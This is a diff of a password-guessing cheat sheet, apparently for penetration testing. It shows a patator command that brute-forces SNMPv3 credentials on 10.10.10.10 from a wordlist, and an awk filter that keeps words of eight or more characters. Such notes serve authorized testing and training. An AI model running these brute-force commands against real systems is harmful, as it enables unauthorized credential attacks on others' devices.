0liverFlow/Cheatsheets/password-guessing.md

 ```
 patator snmp_login host=10.10.10.10 version=3 user=<user> auth_proto=md5 auth_key=FILE0 0=passwords.txt -x ignore:mesg='Wrong SNMP PDU digest' -x ignore:mesg='SNMPv3 requires passwords to be at least 8 characters long'
 ```
-> Patator doesn't take into consideration that `SNMPv3` requires passwords to be at least 8 characters.
+> Patator doesn't take into consideration that `SNMPv3` requires passwords to have at least 8 characters.
 It tries every password no matter the length.
-To fix that, we must select words that have at least 8 characters :
+To fix that, we must select words that have at least 8 characters in our wordlist :
 ```
 awk '{ for (i=1; i<=NF; i++) if (length($i) >= 8) print $i }' <passwords.txt> > long_words.txt
 ```